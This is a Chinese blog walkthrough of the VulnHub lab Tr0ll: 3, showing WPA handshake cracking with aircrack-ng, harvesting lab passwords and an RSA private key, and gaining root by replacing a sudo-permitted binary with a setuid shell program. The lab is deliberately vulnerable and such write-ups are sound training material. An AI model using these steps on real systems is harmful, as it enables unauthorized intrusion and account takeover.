vulnhub靶机渗透[Tr0ll-3]

Posted on Edited on In Views: Word count in article: 2.9k Reading time ≈ 10 mins.

名称

名称:Tr0ll: 3
发布日期:2019年8月6日

下载

  • Download: https://drive.google.com/file/d/1Jshz0VifMrw3S-Kcq8C3nf9HMQtXuKrW/view
  • Download (Mirror): https://download.vulnhub.com/tr0ll/Tr0ll3.ova
  • Download (Torrent): https://download.vulnhub.com/tr0ll/Tr0ll3.ova.torrent

描述

Tr0ll系列的最新版本。这与之前的迭代略有不同,仍然处于Beginner++级别。希望每个人都玩得开心,请确保在flag的屏幕截图上标记@ Maleus21。

您将需要使用start:here登录ssh

类型:Boot 2 root
目标:获取flag.txt
难度:初学者++
娱乐级别:超过9000

信息收集

上nmap

1
2
3
4
root@kali:~# nmap -sn -v 192.168.56.*
Nmap scan report for 192.168.56.120
Host is up (0.00018s latency).
MAC Address: 08:00:27:C3:39:77 (Oracle VirtualBox virtual NIC)
1
2
3
root@kali:~# nmap -v -sV -p- 192.168.56.120
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

使用默认的账号密码登录ssh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
root@kali:~# ssh start@192.168.56.120
Enter passphrase for key '/root/.ssh/id_rsa': 
start@192.168.56.120's password: 
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-55-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

start@Tr0ll3:~$ id
uid=1001(start) gid=1001(start) groups=1001(start)
start@Tr0ll3:~$ whoami
start
start@Tr0ll3:~$ ls
bluepill  redpill
start@Tr0ll3:~$

如下所示使用find命令枚举具有“0777”所有权限的可写文件。

1
2
3
start@Tr0ll3:~$ find / -type f -perm 0777 2>/dev/null
/var/log/.dist-manage/wytshadow.cap
/.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/gold_star.txt

发现两个有趣的文件,一个是“.cap文件”(wytshadow.cap),另一个是“文本文件”(gold_star.txt)。

并将它们下载下来,然后分析它们

有了.cap文件,可以用Wireshark打开该文件,发现所有数据包都将协议标记为“ 802.11”,并且捕获的流量看起来像无线网络数据包,因为众所周知,802.11是用于传输的协议无线连接的设备之间的数据包的数量。

嗯!在这里aircrack-ng可能有助于提取密码。在这里可以将gold_star.txt文件与wytshadow.cap一起使用,如下图所示。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
root@kali:~/vulnhub/troll3# aircrack-ng -w gold_star.txt wytshadow.cap
Reading packets, please wait...
Opening wytshadow.cap
Read 1183 packets.

   #  BSSID              ESSID                     Encryption

   1  18:D6:C7:3F:23:89  wytshadow                 WPA (1 handshake)

Choosing first network as target.

Reading packets, please wait...
Opening wytshadow.cap
Read 1183 packets.

1 potential targets


                               Aircrack-ng 1.6 

      [00:04:34] 2451168/3248872 keys tested (9090.46 k/s) 

      Time left: 1 minute, 27 seconds                           75.45%

                          KEY FOUND! [ gaUoCe34t1 ]


      Master Key     : ED 12 0B 40 F5 AF 80 16 F5 F7 4F 9F 9E 39 BB AE 
                       00 32 07 E9 26 81 31 DB 9C 54 64 84 5E 5D 19 C6 

      Transient Key  : 7F 1C A9 01 4E B9 B3 6F B3 95 7D D2 6E C9 10 BE 
                       50 D4 1A 6C 72 F8 AB 8B 97 A4 20 B1 2D 92 19 18 
                       C7 86 C0 17 2D 05 28 C7 6F 95 06 12 4F C2 F5 2A 
                       87 B7 F5 21 22 3D F7 CA BC 99 8B B5 CA 15 EA 43 

      EAPOL HMAC     : 73 4D E4 22 8E B7 F2 91 4E 74 7D CF 59 73 80 F7

太屌了!!aircrack-ng给了密码:gaUoCe34t1。

获取密码后,将使用凭据wytshadow:gaUoCe34t1切换到另一个名为“wytshadow的帐户”的帐户

1
2
3
4
5
6
7
8
9
10
start@Tr0ll3:~$ su wytshadow
Password: 
wytshadow@Tr0ll3:/home/start$ id
uid=1003(wytshadow) gid=1003(wytshadow) groups=1003(wytshadow)
wytshadow@Tr0ll3:/home/start$ whoami
wytshadow
wytshadow@Tr0ll3:/home/start$ pwd
/home/start
wytshadow@Tr0ll3:/home/start$ ls
ls: cannot open directory '.': Permission denied

成功登录后,查看了“/”目录的目录和文件列表,并注意到一个名为“ohhfun”的文件具有SUID位,因此它具有以root身份运行的权限。

考虑到这一点,按照给定的图形运行了文件。在这里可以看到它通过连续执行文本消息指向LYNX。

1
2
3
4
5
6
wytshadow@Tr0ll3:~$ pwd
/home/wytshadow
wytshadow@Tr0ll3:~$ ./oohfun
iM Cr@zY L1k3 AAA LYNX
iM Cr@zY L1k3 AAA LYNX
iM Cr@zY L1k3 AAA LYNX

Lynx是一个命令行浏览器,也许它将不得不做进一步的工作。

然后,使用Wytshadow的sudo权限,发现nginx可作为root运行。

1
2
3
4
5
6
7
wytshadow@Tr0ll3:~$ sudo -l
[sudo] password for wytshadow: 
Matching Defaults entries for wytshadow on Tr0ll3:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wytshadow may run the following commands on Tr0ll3:
    (root) /usr/sbin/service nginx start

遍历nginx目录并打开其配置文件“sites-enabled sites”文件。看到用户代理为Lynx,正在侦听8080。

如下所示

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
wytshadow@Tr0ll3:/etc/nginx/sites-enabled$ cat default 
##
# You should look at the following URL's in order to grasp a solid understanding
# of Nginx configuration files in order to fully unleash the power of Nginx.
# https://www.nginx.com/resources/wiki/start/
# https://www.nginx.com/resources/wiki/start/topics/tutorials/config_pitfalls/
# https://wiki.debian.org/Nginx/DirectoryStructure
#
# In most cases, administrators will remove this file from sites-enabled/ and
# leave it as reference inside of sites-available where it will continue to be
# updated by the nginx packaging team.
#
# This file will automatically load configuration files provided by other
# applications, such as Drupal or Wordpress. These applications will be made
# available underneath a path with that package name, such as /drupal8.
#
# Please see /usr/share/doc/nginx-doc/examples/ for more detailed examples.
##

# Default server configuration
#
server {
        listen 8080 default_server;
        listen [::]:8080 default_server;
                if ($http_user_agent !~ "Lynx*"){
    return 403;
}
        # SSL configuration
        #
        # listen 443 ssl default_server;
        # listen [::]:443 ssl default_server;
        #
        # Note: You should disable gzip for SSL traffic.
        # See: https://bugs.debian.org/773332
        #
        # Read up on ssl_ciphers to ensure a secure configuration.
        # See: https://bugs.debian.org/765782
        #
        # Self signed certs generated by the ssl-cert package
        # Don't use them in a production server!
        #
        # include snippets/snakeoil.conf;

        root /var/nginx/www;

        # Add index.php to the list if you are using PHP
        index index.html index.htm index.nginx-debian.html;

        server_name _;

        location / {
                # First attempt to serve request as file, then
                # as directory, then fall back to displaying a 404.
                try_files $uri $uri/ =404;
        }

        # pass PHP scripts to FastCGI server
        #
        #location ~ \.php$ {
        #       include snippets/fastcgi-php.conf;
        #
        #       # With php-fpm (or other unix sockets):
        #       fastcgi_pass unix:/var/run/php/php7.0-fpm.sock;
        #       # With php-cgi (or other tcp sockets):
        #       fastcgi_pass 127.0.0.1:9000;
        #}

        # deny access to .htaccess files, if Apache's document root
        # concurs with nginx's one
        #
        #location ~ /\.ht {
        #       deny all;
        #}
}


# Virtual Host configuration for example.com
#
# You can move that to a different file under sites-available/ and symlink that
# to sites-enabled/ to enable it.
#
#server {
#       listen 80;
#       listen [::]:80;
#
#       server_name example.com;
#
#       root /var/www/example.com;
#       index index.html;
#
#       location / {
#               try_files $uri $uri/ =404;
#       }
#}

此外,如上所示,启动了nginx服务。使用netstat命令,看到端口8080已打开。再次尝试进行nmap扫描,如下所示。

1
2
3
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
8080/tcp open  http    nginx 1.14.0 (Ubuntu)
1
2
3
4
5
6
7
8
9
10
11
12
wytshadow@Tr0ll3:/etc/nginx/sites-enabled$ sudo /usr/sbin/service nginx start
wytshadow@Tr0ll3:/etc/nginx/sites-enabled$ netstat -antp
(No info could be read for "-p": geteuid()=1003 but you should be root.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:8080            0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 192.168.56.120:22       192.168.56.1:20737      ESTABLISHED -                   
tcp        0    448 192.168.56.120:22       192.168.56.102:48480    ESTABLISHED -                   
tcp6       0      0 :::8080                 :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -

如前所述,在本地计算机上安装一个lynx浏览器。打开与刚打开的端口关联的页面。

1
2
3
4
root@kali:~/vulnhub/troll3# apt-get install lynx
...
root@kali:~/vulnhub/troll3# lynx http://192.168.56.120:8080/
genphlux:HF9nd0cR!

通过lynx打开页面上给定的链接时,会找到这些登录凭据。不是那么困难。

找到的凭证:

1
2
Username: genphlux
Password: HF9nd0cr!

随着有了更多的凭据,使用上述枚举凭据切换到genphlux的用户。

1
2
3
4
5
6
7
8
9
wytshadow@Tr0ll3:/home$ su genphlux
Password: 
genphlux@Tr0ll3:/home$ id
uid=1004(genphlux) gid=1004(genphlux) groups=1004(genphlux)
genphlux@Tr0ll3:/home$ whoami
genphlux
genphlux@Tr0ll3:/home$ pwd
/home
genphlux@Tr0ll3:/home$

登录后,找到了一个名为maleus的文件,如下所示,并且通过浏览该文件,看到了它存储RSA密钥。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
genphlux@Tr0ll3:/home$ cd
genphlux@Tr0ll3:~$ ls -la
total 44
drwx------  4 genphlux genphlux 4096 Aug  2  2019 .
drwxr-xr-x 10 root     root     4096 Jun 19  2015 ..
-rw-r--r--  1 genphlux genphlux  220 Jun 17  2015 .bash_logout
-rw-r--r--  1 genphlux genphlux 3637 Jun 17  2015 .bashrc
drwx------  2 genphlux genphlux 4096 Jun 17  2015 .cache
drwx------  3 genphlux genphlux 4096 Aug  1  2019 .gnupg
-rw-rw-r--  1 genphlux genphlux 1675 Jun 18  2015 maleus
-rw-r--r--  1 genphlux genphlux  675 Jun 17  2015 .profile
-rw-------  1 genphlux genphlux 5649 Jun 17  2015 .viminfo
-rw-rw-r--  1 genphlux genphlux  931 Aug  2  2019 xlogin
genphlux@Tr0ll3:~$ file maleus 
maleus: PEM RSA private key
genphlux@Tr0ll3:~$ cat maleus 
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAwz5Hwer48U1t/Qi9JveuO+Z7WQlnmhOOs/2pZ0he/OyVsEFv
DsGib1wu/N8t+7h9JZK9x2GL33TXQBVCy6TxES90F1An+2DSza6lJPCyhcgK/DEp
yxSVt32A+lFo+PQJV6QYZlpRkek0MjUw5y/E5qZwdBypC55C4QzgQBN3+Lnuhuk4
u52xcK9/6/2N7JZCNYA21Tp1Uy9mty/65IT7OwKJd2rXp3O6rZYTD/vPl+Rt/LtN
gA1DbDODq0NCmvcrZL+SafSj+MABA3LCERw01gA4RMdyxJU6hVfjeSKOdwDQOGWe
eAVCL2GR/frwyf+rfN1kbpdw/RGXWWwVANMcaQIDAQABAoIBAGNudFztrZo2NK2I
pcwSl0kqN+dAQuLU0vgXVw6ibL2iPxlkOYrqUi8kY0mk32YyrolUEhJYO0Ox3W1l
Zn8PoTV/VUAKMlJzHOhi6PfHHSPEnNOSthYWhajM4cKZczxWC+v2RfbaSHBms45e
SGl0inJskRiRAAZKswSp6gq334FrS6Dwy1tiKvzCfR3kLQghV5U/PhFZCsq3xvAw
eXPx2toNtU2gYSGrKWTep+nAKM1neBxeZAujYuN4xJ5/Th2y0pyTvX9WEgzKPJ/G
PlYZYCUAKPCbabYSuZckjeiN1aS52AIFedECBfAIezOr08Wx/bI/xCOgBxrQgPrK
kRvlOYECgYEA5eCIEfdLhWdg3ltadYE0O5VAoXKrbxYWqSyw1Eyeqj0N1qD9Rsvg
jIQJazV5JcVBIF54f/jlCJozR5s5AELrY0Z/krea1lF5ecOSUQE3tp94298xzO3g
7BBe3g6pD56Cya/Vo0+YVQmAnBHLh6QIYvUUXXN2IyceT8fhEx5JA+sCgYEA2W4z
KKMVAdPxKcjVks1zdGmVlj1RsUkakYuLWV3jQe2w1naJrc37Khy5eWZaRJhXqeBb
1cvTMa+r/BF7jvItxglWoBJqXDxKI0a6KqWtloZL2ynoaBkAhR2btob6nSN63Bpg
ZYJKY1B5yYbDHK4k6QT7atn2g6DAv/7sW6skj/sCgYA16WTAIek6TjZvr6kVacng
N27C7mu6T8ncvzhxcc68SjlWnscHtYTiL40t8YqKCyrs9nr4OF0umUtxfbvujcM6
syv0Ms9DeDQvFGjaSpjQYbIsjrnVP+zCMEyvc2y+1wQBXRWTiXVGbEYXVC0RkKzO
2H+AMzX/pIr9Vvk4TJ//JQKBgFNJcy9NyO46UVbAJ49kQ6WEDFjQhEp0xkiaO3aw
EC1g7yw3m+WH0X4AIsvt+QXtlSbtWkA7I1sU/7w+tiW7fu0tBpGqfDN4pK1+mjFb
5XKTXttE4lF9wkU7Yjo42ib3QEivkd1QW05PtVcM2BBUZK8dyXDUrSkemrbw33j9
xbOhAoGBAL8uHuAs68ki/BWcmWUUer7Y+77YI/FFm3EvP270K5yn0WUjDJXwHpuz
Fg3n294GdjBtQmvyf2Wxin4rxl+1aWuj7/kS1/Fa35n8qCN+lkBzfNVA7f626KRA
wS3CudSkma8StmvgGKIU5YcO8f13/3QB6PPBgNoKnF5BlFFQJqhK
-----END RSA PRIVATE KEY-----

因此,将RSA密钥复制到一个名为“key”的文本文件中,并分配了权限600,该权限只能由特定用户访问。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
root@kali:~/vulnhub/troll3# chmod 600 key
root@kali:~/vulnhub/troll3# ssh maleus@192.168.56.120 -i key
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-55-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

maleus@Tr0ll3:~$ id
uid=1000(maleus) gid=1000(maleus) groups=1000(maleus),1005(backups)
maleus@Tr0ll3:~$ whoami
maleus
maleus@Tr0ll3:~$ pwd
/home/maleus

成功登录后,找到了一个名为“don’t_even_bother”的文件,该文件具有完全权限,并且借助文件的类型,确定其类型为ELF 64位,此外,在其中找到了另一个文件“.viminfo”文件。同一目录。

1
2
3
4
5
6
7
8
9
10
11
12
maleus@Tr0ll3:~$ ls -la
total 48
drwx------  5 maleus maleus 4096 Aug  2  2019 .
drwxr-xr-x 10 root   root   4096 Jun 19  2015 ..
-rw-r--r--  1 maleus maleus  220 Jun 17  2015 .bash_logout
-rw-r--r--  1 maleus maleus 3637 Jun 17  2015 .bashrc
drwx------  2 maleus maleus 4096 Jun 17  2015 .cache
-rwxrwxr-x  1 maleus maleus 8674 Jun 18  2015 dont_even_bother
drwx------  3 maleus maleus 4096 Aug  1  2019 .gnupg
-rw-r--r--  1 maleus maleus  675 Jun 17  2015 .profile
drwx------  2 maleus maleus 4096 Jun 18  2015 .ssh
-rw-------  1 maleus maleus 1301 Aug  2  2019 .viminfo

此外,使用cat命令来检查viminfo文件。经过仔细检查,发现了maleus用户的密码“B^slc8I$”。这是一个很好的发现。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
maleus@Tr0ll3:~$ cat .viminfo
# This viminfo file was generated by Vim 7.4.
# You may edit it if you're careful!

# Value of 'encoding' when this file was written
*encoding=utf-8


# hlsearch on (H) or off (h):
~h
# Command Line History (newest to oldest):
:wq
:q
:q!
:!shell

# Search String History (newest to oldest):

# Expression History (newest to oldest):

# Input Line History (newest to oldest):

# Input Line History (newest to oldest):

# Registers:
""1     LINE    0
        passwd
"2      LINE    0
        B^slc8I$
"3      LINE    0
        passswd  

# File marks:

# Jumplist (newest first):

# History of marks within files (newest to oldest):

        +       25      62

> ~/Desktop/troll3/maleus
        *       1564779412      0
        "       27      28
        ^       27      29
        .       27      28
        +       27      28
> ~/Desktop/troll3/maleus
        *       1564779412      0
        "       27      28
        ^       27      29
        .       27      28
        +       27      28
> ~/Desktop/troll3/maleus
        *       1564779412      0
        "       27      28
        ^       27      29
        .       27      28
        +       27      28
> ~/Desktop/troll3/maleus
        *       1564779412      0
        "       27      28
        ^       27      29
        .       27      28
        +       27      28
> ~/Desktop/troll3/maleus
        *       1564779412      0
        "       27      28
        ^       27      29
        .       27      28
        +       27      28
> ~/Desktop/troll3/maleus
        *       1564779412      0
        "       27      28
        ^       27      29
        .       27      28
        +       27      28
> ~/Desktop/troll3/maleus
        *       1564779412      0
        "       27      28
        ^       27      29
        .       27      28
        +       27      28
> ~/Desktop/troll3/maleus
        *       1564779412      0
        "       27      28
        ^       27      29
        .       27      28
        +       27      28
> ~/Desktop/troll3/maleus
        *       1564779412      0
        "       27      28
        ^       27      29
        .       27      28
        +       27      28

提权

现在有了maleus的密码,确定maleus的sudo权限。

1
2
3
4
5
6
7
maleus@Tr0ll3:~$ sudo -l
[sudo] password for maleus: 
Matching Defaults entries for maleus on Tr0ll3:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User maleus may run the following commands on Tr0ll3:
    (root) /home/maleus/dont_even_bother

运行命令后,发现maleus可以以root用户身份运行don’t_even_bother文件。因此,为了提升此计算机上的权限,将使用此文件来注入恶意代码。首先,使用echo清空此文件的内容,然后使用nano命令对其进行编辑。

1
2
3
4
maleus@Tr0ll3:~$ echo "" > dont_even_bother
maleus@Tr0ll3:~$ cat dont_even_bother 

maleus@Tr0ll3:~$ nano dont_even_bother.c

现在,在打开该文件之后,编写了一个小的.C脚本,它将在编译后执行时调用shell。

1
2
3
4
int main (void){
       setresuid(0, 0, 0);
       system("/bin/sh");
}

现在,因为是“.c”文件,所以将不得不使用gcc编译器对其进行编译,然后按照sudo权限执行该文件dont_even_bother。

即可获取系统root权限并且找到了flag文件,如下所示:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
maleus@Tr0ll3:~$ ls
dont_even_bother  dont_even_bother.c
maleus@Tr0ll3:~$ gcc dont_even_bother.c -o dont_even_bother
dont_even_bother.c: In function ‘main’:
dont_even_bother.c:2:8: warning: implicit declaration of function ‘setresuid’ [-Wimplicit-function-declaration]
        setresuid(0, 0, 0);
        ^~~~~~~~~
dont_even_bother.c:3:8: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration]
        system("/bin/sh");
        ^~~~~~
maleus@Tr0ll3:~$ sudo /home/maleus/dont_even_bother
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# pwed
/bin/sh: 3: pwed: not found
# pwd
/home/maleus
# cd /root
# ls
flag.txt
# cat flag.txt  
You are truly a Jedi!

Twitter Proof:

Pr00fThatTh3L33tHax0rG0tTheFl@g!!

@Maleus21

知识点总结

  • aircrack-ng破解.cap包密码
  • nginx用户代理
  • lynx浏览器使用
  • 使用ssh RSA密钥登录ssh
  • .viminfo文件泄露密码
  • setresuid(0, 0, 0) c语言脚本提权

Game over

不好意思,这次还是没有找到希腊某位大佬的傻瓜式一键通关脚本,i am so sorry about this…It’s a pity…

The end,to be continue…